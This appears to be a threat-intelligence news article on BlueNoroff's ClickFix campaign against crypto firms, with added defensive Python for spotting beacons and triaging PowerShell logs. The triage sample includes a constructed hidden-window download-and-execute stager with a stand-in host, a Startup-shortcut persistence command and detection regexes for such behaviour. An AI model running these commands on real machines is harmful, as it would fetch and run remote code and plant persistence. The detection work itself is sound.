BlueNoroff Uses Fileless PowerShell, AI Zoom Lures in New Campaign
Key Takeaways
- North Korea’s BlueNoroff (APT38) group is executing a sophisticated phishing campaign targeting Web3 and cryptocurrency firms across over 20 countries.
- The attack chain leverages AI-generated Zoom lures and a unique “ClickFix” clipboard injection technique to deploy fileless PowerShell malware.
- Victims, often C-level executives, face rapid system compromise, persistent access for months, and exfiltration of sensitive data, including browser credentials and webcam footage used for future deepfake lures.
North Korea’s state-sponsored Lazarus Group has launched a new campaign run by its financially motivated subgroup, BlueNoroff. The operation, detailed in a recent analysis by Arctic Wolf, combines targeted social engineering, AI-generated content, and fileless PowerShell tradecraft to infiltrate Web3 and cryptocurrency organizations globally. Victims have been identified in more than 20 countries, with the United States accounting for 41% of them.
Sophisticated Social Engineering and AI Lures
The attack sequence begins with a carefully crafted spear-phishing email. Threat actors impersonate legal professionals within the FinTech sector, sending Calendly invitations to their targets. Once a victim accepts the meeting, the malicious actor subtly replaces the legitimate Google Meet link with a typosquatted Zoom URL, meticulously designed to mimic an authentic meeting link.
When the unsuspecting victim clicks the fabricated link, their browser loads a self-contained HTML page. This page is an elaborate replica of a genuine Zoom meeting interface, complete with simulated participant video tiles, looping video footage, and a dynamic “active speaker” indicator. This deceptive environment is critical to the next stage of the attack.
Arctic Wolf analysts confirmed this targeted intrusion against a North American Web3 and cryptocurrency company, attributing it with high confidence to BlueNoroff, also known as APT38, Sapphire Sleet, and Stardust Chollima. The speed of the compromise is alarming, with researchers observing the full attack chain—from initial click to complete system compromise—concluding in under five minutes.
Post-compromise forensic analysis revealed that the attackers maintained persistent access on the victim’s device for 66 days. During this period, they exfiltrated critical data, including browser credentials, Telegram session data, and live webcam footage. This stolen webcam footage is then repurposed to create even more convincing lures for subsequent targets, fueling a self-reinforcing deepfake production pipeline.
Analysts discovered over 950 files on the attacker’s hosting server, comprising AI-generated headshot images – confirmed via C2PA cryptographic metadata as outputs of OpenAI’s GPT-4o model – alongside genuine webcam footage from previous victims and composite deepfake videos. This continuous refinement of their deceptive tactics ensures that each successful attack improves the credibility of future social engineering attempts. BlueNoroff’s strategic focus is evident in its targeting: CEOs and founders constitute 45% of all identified victims, reflecting the group’s intent to gain direct access to cryptocurrency assets and wallet infrastructure.
The ClickFix Payload Delivery
Upon entering the fake Zoom meeting environment, victims encounter a persistent overlay message claiming their SDK is outdated and requires an update. This is the core of the “ClickFix” clipboard injection attack. The overlay presents what appear to be benign diagnostic commands, instructing the user to copy and paste them into the Windows Run dialog or terminal.
Crucially, the commands displayed on the page are not what ends up on the clipboard: at copy time the malicious HTML page swaps the clipboard content for a hidden PowerShell execution command. When the victim pastes into the Run dialog and presses Enter, they execute that payload rather than the diagnostic command they believe they copied. Because the displayed text and the clipboard text differ, pasting into a plain text editor first would expose the substitution.
The injected PowerShell command downloads an obfuscated second-stage script from the attacker’s command-and-control (C2) server. That stage is written to the user’s Temp folder under the benign-looking name “chromechip.log” (a script hiding behind a non-script extension) and then executed in a hidden PowerShell window. The C2 beacon it spawns runs entirely in memory, so “fileless” describes the beacon, not the staging file, and persistence is provided by the Startup-folder shortcut named in the remediation steps below. The beacon polls the attacker every five seconds, collecting hostname, OS version, running processes, whether the session holds administrative privileges, and timezone information, and packages it as a structured JSON beacon for transmission to the remote server.
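A fixed five-second poll is a network-level signal that survives obfuscation of the script itself. The following is an added example (not code from the page or from the Arctic Wolf analysis) that flags beacon-like destinations in constructed proxy records by looking at the regularity of inter-connection gaps rather than exact timing, so it still catches beacons that add a little jitter. The log format, hosts and timestamps are all constructed for illustration.

```python
"""Flag beacon-like outbound connections in constructed proxy/firewall records.

Added example, not code from the page or the Arctic Wolf report. The record
format "timestamp src dst:port bytes", the addresses and the timestamps are
constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample. 203.0.113.7 is an exact 5-second beacon, 203.0.113.9 is a
# 5-second beacon with +/-1 s jitter, and 198.51.100.20 is ordinary, irregular
# browsing (variable gaps and sizes) that should not be flagged.
SAMPLE_LOG = """\
2025-01-10T09:00:00 10.0.0.5 203.0.113.7:443 412
2025-01-10T09:00:05 10.0.0.5 203.0.113.7:443 408
2025-01-10T09:00:10 10.0.0.5 203.0.113.7:443 415
2025-01-10T09:00:15 10.0.0.5 203.0.113.7:443 410
2025-01-10T09:00:20 10.0.0.5 203.0.113.7:443 409
2025-01-10T09:00:25 10.0.0.5 203.0.113.7:443 413
2025-01-10T09:00:30 10.0.0.5 203.0.113.7:443 411
2025-01-10T09:00:00 10.0.0.5 203.0.113.9:443 420
2025-01-10T09:00:04 10.0.0.5 203.0.113.9:443 418
2025-01-10T09:00:10 10.0.0.5 203.0.113.9:443 421
2025-01-10T09:00:15 10.0.0.5 203.0.113.9:443 419
2025-01-10T09:00:19 10.0.0.5 203.0.113.9:443 422
2025-01-10T09:00:25 10.0.0.5 203.0.113.9:443 417
2025-01-10T09:00:30 10.0.0.5 203.0.113.9:443 420
2025-01-10T09:00:02 10.0.0.5 198.51.100.20:443 18233
2025-01-10T09:00:09 10.0.0.5 198.51.100.20:443 2201
2025-01-10T09:00:31 10.0.0.5 198.51.100.20:443 90112
2025-01-10T09:01:47 10.0.0.5 198.51.100.20:443 4400
2025-01-10T09:03:01 10.0.0.5 198.51.100.20:443 1200
2025-01-10T09:04:33 10.0.0.5 198.51.100.20:443 66002
2025-01-10T09:05:12 10.0.0.5 198.51.100.20:443 700
"""


def parse(log_text):
    """Group connection timestamps by destination for the constructed format."""
    by_dst = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, _src, dst, _size = line.split()
        by_dst[dst].append(datetime.fromisoformat(ts))
    return by_dst


def intervals(timestamps):
    """Seconds between consecutive connections, in time order."""
    ts = sorted(timestamps)
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]


def beacon_score(timestamps, min_events=6):
    """Return (mean_gap, coefficient_of_variation) for a destination.

    A fixed-period beacon has a CV near 0; jitter raises it a little, human
    browsing raises it a lot. Destinations with too few events return (None, None).
    """
    if len(timestamps) < min_events:
        return None, None
    gaps = intervals(timestamps)
    m = mean(gaps)
    if m == 0:
        return None, None
    return m, pstdev(gaps) / m


def find_beacons(log_text, max_cv=0.2, min_events=6):
    """Map each beacon-like destination to its estimated period in seconds."""
    flagged = {}
    for dst, times in parse(log_text).items():
        period, cv = beacon_score(times, min_events)
        if period is not None and cv <= max_cv:
            flagged[dst] = round(period, 1)
    return flagged


if __name__ == "__main__":
    for dst, period in find_beacons(SAMPLE_LOG).items():
        print(f"beacon-like: {dst} every ~{period}s")
```

The CV threshold and minimum event count are the tuning knobs: lowering `max_cv` trades missed jittered beacons for fewer false positives from polling-based legitimate services (which also tend to be regular), so in practice the output is a candidate list to join against destination reputation, not a verdict on its own.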
What You Should Do
- Verify Meeting Links: Always cross-reference meeting links through a secondary communication channel (e.g., a phone call or separate email) before joining any virtual call, especially for sensitive discussions.
- Beware of Software Update Prompts: Legitimate video conferencing platforms do not ask users to paste commands into the Run dialog or a terminal to fix audio, camera or “SDK” problems. Treat any such prompt as an attack, and never run text copied from a web page without first inspecting it in a plain text editor.
- Block C2 Infrastructure: Security teams should block the command-and-control (C2) addresses published in the Arctic Wolf analysis and search proxy and firewall logs for past connections to them.
- Remove Persistence Mechanisms: Delete the Startup shortcut named “Chrome Update Certificated.lnk” and remove “chromechip.log” and “chrome-debug-data001.log” from affected devices. Deleting files alone does not end an active session, because the beacon runs in memory: isolate the host and terminate the hidden PowerShell process first. Given the 66-day dwell time and credential theft observed, treat any confirmed victim as fully compromised and rebuild it rather than clean it.
- Rotate Credentials: Promptly rotate all browser-stored passwords, API keys, and cryptocurrency wallet credentials on any potentially compromised system.
- Enable PowerShell Script Block Logging: Implement PowerShell Script Block Logging on all endpoints. It records script blocks as they are executed (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), so obfuscation layers that are decoded at runtime, a key tactic in this campaign, appear in the log in their decoded form, together with the hidden-window launch and the download to the Temp folder.
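Once Script Block Logging is on, the question becomes how to pick the stager out of the volume of ordinary PowerShell. The following added example (mine, not code from the page or Arctic Wolf) scores constructed Event ID 4104 records against the behaviours described above: hidden window, remote download, staging under the Temp folder, a script disguised with a .log/.txt/.dat extension, in-memory execution, and creation of a Startup-folder shortcut. The event records, the indicator weights and the threshold are all my assumptions; the sample stager line is a constructed pattern, not the actual command used in the campaign.

```python
"""Triage PowerShell Script Block Logging (Event ID 4104) text for ClickFix-style stagers.

Added example, not code from the page or the Arctic Wolf report. The event
records, indicator weights and threshold below are constructed assumptions;
real 4104 events carry the block in the ScriptBlockText field.
"""
import re

# Behavioural indicators drawn from the campaign description. The regexes are
# deliberately loose; the weighting, not any single hit, decides the outcome.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "remote_download": re.compile(
        r"Invoke-WebRequest|DownloadString|DownloadFile|\biwr\b|\bcurl\b", re.I),
    "temp_staging": re.compile(r"\$env:TEMP|%TEMP%|\\AppData\\Local\\Temp", re.I),
    "benign_ext_script": re.compile(r"[\w-]+\.(?:log|txt|dat)\b", re.I),
    "in_memory_exec": re.compile(
        r"Invoke-Expression|\biex\b|\[ScriptBlock\]::Create", re.I),
    "startup_persistence": re.compile(
        r"\\Start Menu\\Programs\\Startup\\|\.lnk\b", re.I),
}

# Assumed weights: a Startup-folder shortcut alone is worth an analyst's look;
# the other indicators only add up to a hit in combination.
WEIGHTS = {
    "hidden_window": 2,
    "remote_download": 1,
    "temp_staging": 1,
    "benign_ext_script": 1,
    "in_memory_exec": 2,
    "startup_persistence": 4,
}
THRESHOLD = 4

# Constructed 4104-style records. Record 1 mimics the stager behaviour from the
# text (hidden window, download to Temp as a .log, run via iex) with a TEST-NET
# address; 2 and 3 are benign admin activity that touch some of the same
# indicators; 4 creates a shortcut with the artefact name named in the article.
SAMPLE_EVENTS = [
    {"id": 1, "EventID": 4104, "Computer": "WS-CFO01",
     "ScriptBlockText": r'powershell -w hidden -c "iwr http://192.0.2.10/s -OutFile '
                        r'$env:TEMP\stage.log; iex (Get-Content $env:TEMP\stage.log -Raw)"'},
    {"id": 2, "EventID": 4104, "Computer": "WS-ADMIN3",
     "ScriptBlockText": r"Get-ChildItem $env:TEMP -Filter *.log | Remove-Item -Force"},
    {"id": 3, "EventID": 4104, "Computer": "WS-ADMIN3",
     "ScriptBlockText": r"Invoke-WebRequest https://example.com/report.csv -OutFile C:\Reports\report.csv"},
    {"id": 4, "EventID": 4104, "Computer": "WS-CFO01",
     "ScriptBlockText": r'(New-Object -ComObject WScript.Shell).CreateShortcut('
                        r'"$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update Certificated.lnk").Save()'},
    {"id": 5, "EventID": 4103, "Computer": "WS-CFO01",
     "ScriptBlockText": "module logging record, ignored here"},
]


def score_block(text):
    """Return (score, matched indicator names) for one script block."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return sum(WEIGHTS[h] for h in hits), hits


def triage(events, threshold=THRESHOLD):
    """Return the 4104 events whose block scores at or above the threshold."""
    flagged = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        score, hits = score_block(ev["ScriptBlockText"])
        if score >= threshold:
            flagged.append({"id": ev["id"], "Computer": ev["Computer"],
                            "score": score, "indicators": hits})
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"[{hit['Computer']}] event {hit['id']} score={hit['score']} {hit['indicators']}")
```

Because 4104 logs each block as it is compiled, a stager that decodes an inner layer with `Invoke-Expression` produces a second record containing the decoded text, so the same scoring applies to both layers; a weighted sum rather than a single-pattern rule is what keeps the benign Temp cleanup and the plain file download out of the queue.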
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.